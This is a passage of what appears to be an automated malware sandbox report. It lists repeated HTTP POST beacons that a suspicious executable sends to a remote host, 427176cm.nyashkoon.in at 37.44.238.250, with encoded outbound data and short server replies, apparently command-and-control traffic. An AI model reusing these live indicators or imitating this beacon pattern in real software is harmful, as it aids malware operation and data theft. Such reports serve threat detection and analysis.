                                        109192.168.2.75007937.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:51.528162003 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:51.880351067 CET1032OUTData Raw: 5e 58 43 5b 5c 59 5a 56 5e 5e 54 55 56 5c 5a 5c 5f 57 59 59 52 51 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XC[\YZV^^TUV\Z\_WYYRQRPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$,X$='18^/+ >5?0</*)0<3.$$(*&G!']*?
                                        Nov 5, 2024 08:13:52.347029924 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:52.428056955 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:50 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        110192.168.2.75008037.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:52.554878950 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:52.912395954 CET1028OUTData Raw: 5b 58 43 52 59 54 5a 51 5e 5e 54 55 56 5a 5a 5c 5f 5a 59 50 52 50 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [XCRYTZQ^^TUVZZ\_ZYPRPRQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'$$+;]0=&($/;(="W$&$=?38**&G!']*3
                                        Nov 5, 2024 08:13:53.397147894 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:53.473309994 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:51 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        111192.168.2.75008137.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:53.603728056 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:53.958729029 CET1032OUTData Raw: 5b 59 46 5d 59 58 5f 50 5e 5e 54 55 56 58 5a 5e 5f 5b 59 5c 52 51 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [YF]YX_P^^TUVXZ^_[Y\RQRPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'#'[&%!'/8');$7_>0<:X3=3^$87Y*&G!']*/


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        112192.168.2.75008237.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:54.340676069 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1288
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:54.698344946 CET1288OUTData Raw: 5b 55 46 5f 59 59 5f 52 5e 5e 54 55 56 5a 5a 5a 5f 57 59 51 52 51 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [UF_YY_R^^TUVZZZ_WYQRQRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$T '1]0"8Z/<[=%0Z0<;[)=U$/2_'= %+?[>:&G!']*+
                                        Nov 5, 2024 08:13:55.169569969 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:55.242516041 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 07 24 28 30 13 34 03 21 0e 2a 3d 3c 1e 22 0e 23 5c 38 3d 3b 04 33 33 23 0a 29 06 2e 18 21 3a 3a 58 35 13 3b 05 23 2e 2c 0c 2a 1b 2f 5a 07 10 25 13 26 21 23 53 32 2e 3b 06 24 1d 33 5e 2a 02 3f 00 36 02 3f 12 27 3b 1c 06 25 2a 0a 0a 3b 07 22 0f 2d 06 01 5c 2e 31 20 58 26 1e 2c 54 0d 10 39 56 3d 21 06 11 2a 12 31 5c 31 51 34 56 22 3e 3f 5b 3e 2a 23 0f 3f 3d 25 01 30 09 34 50 21 32 32 0b 31 38 28 13 24 1f 23 0e 24 32 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :$(04!*=<"#\8=;33#).!::X5;#.,*/Z%&!#S2.;$3^*?6?';%*;"-\.1 X&,T9V=!*1\1Q4V">?[>*#?=%04P!2218($#$2%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        113192.168.2.75008337.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:54.474334955 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:54.817847967 CET1032OUTData Raw: 5b 55 46 5d 59 5c 5a 55 5e 5e 54 55 56 5b 5a 5c 5f 5b 59 5c 52 59 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [UF]Y\ZU^^TUV[Z\_[Y\RYRYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.C3?33T7/] ^)%8^0<+_).Q$/%0'\'(*&G!']*#
                                        Nov 5, 2024 08:13:55.285463095 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:55.355393887 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        114192.168.2.75008437.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:55.483747959 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:55.833560944 CET1032OUTData Raw: 5b 58 43 53 59 5e 5a 53 5e 5e 54 55 56 5f 5a 5a 5f 53 59 5d 52 50 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [XCSY^ZS^^TUV_ZZ_SY]RPRXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.G02Z3.02(_/+3)%#0,^=&Q$<%'.7X34)&G!']*3
                                        Nov 5, 2024 08:13:56.301719904 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:56.386116028 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V
                                        Nov 5, 2024 08:13:57.450011969 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V
                                        Nov 5, 2024 08:13:57.450069904 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V
                                        Nov 5, 2024 08:13:57.450334072 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        115192.168.2.75008537.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:57.451988935 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:57.802262068 CET1032OUTData Raw: 5e 58 43 5c 59 55 5f 57 5e 5e 54 55 56 52 5a 5f 5f 53 59 5c 52 5c 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XC\YU_W^^TUVRZ__SY\R\R^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-0"3*$1(\,#?64Y' =.2$<00+#):&G!']*
                                        Nov 5, 2024 08:13:58.273480892 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:58.354895115 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:56 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        116192.168.2.75008637.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:58.474900007 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:58.834311962 CET1032OUTData Raw: 5e 5a 43 5c 59 5f 5a 5c 5e 5e 54 55 56 5e 5a 5c 5f 5a 59 5a 52 59 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^ZC\Y_Z\^^TUV^Z\_ZYZRYRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.%230=X0"?88;?%$'< =5',&$-('X=&G!']*7
                                        Nov 5, 2024 08:13:59.287149906 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:59.368043900 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:57 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        117192.168.2.75008737.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:59.741625071 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:00.099188089 CET1032OUTData Raw: 5b 55 43 5e 59 5c 5a 52 5e 5e 54 55 56 5f 5a 59 5f 5b 59 59 52 59 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [UC^Y\ZR^^TUV_ZY_[YYRYR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A02Y'[=3'/80>580< >=*U%,&X$>7X$(4+:&G!']*3


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        118192.168.2.75008837.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:00.261816978 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1276
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:00.614716053 CET1276OUTData Raw: 5b 5a 46 5e 5c 5d 5a 50 5e 5e 54 55 56 5e 5a 59 5f 5a 59 51 52 51 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [ZF^\]ZP^^TUV^ZY_ZYQRQRPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$2 _%=*%2/8,_?50'*==3Y'$(4=&G!']*7
                                        Nov 5, 2024 08:14:01.072973967 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:01.146430969 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 07 33 38 24 51 37 3a 2a 51 28 00 38 5a 35 19 06 02 2c 2d 24 1f 33 1d 20 1e 3e 06 22 19 21 29 25 00 36 3d 34 1b 20 3d 3f 57 3e 31 2f 5a 07 10 26 05 31 21 2f 57 25 10 05 01 25 23 2f 5e 28 3c 1d 05 22 02 2f 12 25 3b 1b 5f 26 5c 37 1b 2e 3a 3a 0f 2e 16 30 07 39 57 23 07 31 34 2c 54 0d 10 39 53 28 22 38 53 2a 2c 31 5c 26 27 38 1d 23 3e 33 10 3d 03 27 0b 2b 2d 08 17 27 1e 30 51 21 31 32 0e 25 02 37 05 25 21 06 51 25 18 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :38$Q7:*Q(8Z5,-$3 >"!)%6=4 =?W>1/Z&1!/W%%#/^(<"/%;_&\7.::.09W#14,T9S("8S*,1\&'8#>3='+-'0Q!12%7%!Q%%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        119192.168.2.75008937.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:00.384543896 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:00.740317106 CET1032OUTData Raw: 5b 5d 43 5c 59 54 5a 5c 5e 5e 54 55 56 58 5a 5a 5f 56 59 5f 52 5c 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: []C\YTZ\^^TUVXZZ_VY_R\RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.B08Z'3$\8>(Z3<>*W3.^&>;08$=&G!']*/
                                        Nov 5, 2024 08:14:01.219640017 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:01.304662943 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        120192.168.2.75009037.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:01.430138111 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:14:01.790092945 CET1032OUTData Raw: 5b 58 43 52 59 5c 5f 56 5e 5e 54 55 56 5d 5a 5b 5f 5b 59 58 52 5a 52 5f 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [XCRY\_V^^TUV]Z[_[YXRZR_YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$/%.-]$T#;8;)C#'#*..%/*'[;X'4>*&G!']*
                                        Nov 5, 2024 08:14:02.245803118 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:02.331181049 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:00 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        121192.168.2.75009137.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:02.463392973 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:02.818649054 CET1032OUTData Raw: 5e 5d 46 5d 59 54 5a 54 5e 5e 54 55 56 5c 5a 5d 5f 50 59 59 52 5d 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]F]YTZT^^TUV\Z]_PYYR]RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-%!,Z'="'$;8[)&<Y'<>=&3)$.$$( >&G!']*?
                                        Nov 5, 2024 08:14:03.281985044 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:03.368546963 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        122192.168.2.75009237.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:03.507064104 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:03.865230083 CET1028OUTData Raw: 5e 5d 43 52 5c 5f 5a 5d 5e 5e 54 55 56 5a 5a 58 5f 5a 59 51 52 5d 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]CR\_Z]^^TUVZZX_ZYQR]R]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.F$"$3-'_/]3*5;%,,>1'$+%;?[+:&G!']*#
                                        Nov 5, 2024 08:14:04.965688944 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:04.965708971 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V
                                        Nov 5, 2024 08:14:04.965718985 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V
